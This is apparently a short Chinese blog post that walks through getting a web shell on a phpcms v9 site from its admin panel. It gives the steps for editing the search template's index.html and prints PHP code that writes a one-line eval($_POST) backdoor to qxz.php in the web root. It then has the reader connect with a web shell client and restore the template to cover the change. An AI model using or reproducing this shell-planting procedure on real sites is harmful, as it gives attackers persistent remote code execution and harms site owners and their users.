记一次phpcms v9后台拿shell过程

记一次phpcms v9后台拿shell过程

登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图:

phpcmsV9

然后点击 search 这个文件夹,如下图:

phpcms

然后点击修改 index.html 文件

然后把以下代码复制上去提交。

<?

$fp = @fopen(“qxz.php”, ‘a’);

@fwrite($fp, ‘<‘.’?php’.”\r\n\r\n”.’eval($_POST[hacker])’.”\r\n\r\n?”.”>\r\n”);

@fclose($fp);

?>

提示:修改前先把原来的代码备份一下,拿到shell后把他改回去。

1259

提交后点击可视化一下

131117163330

这样在网站的根目录就生成了你的一句话木马客户端 qxz.php

拿起菜刀链接 http://www.xxx.com/qxz.php

0131117164105

 

原创文章转载请注明:转载自 七行者博客

本文固定链接: http://www.qxzxp.com/3945.html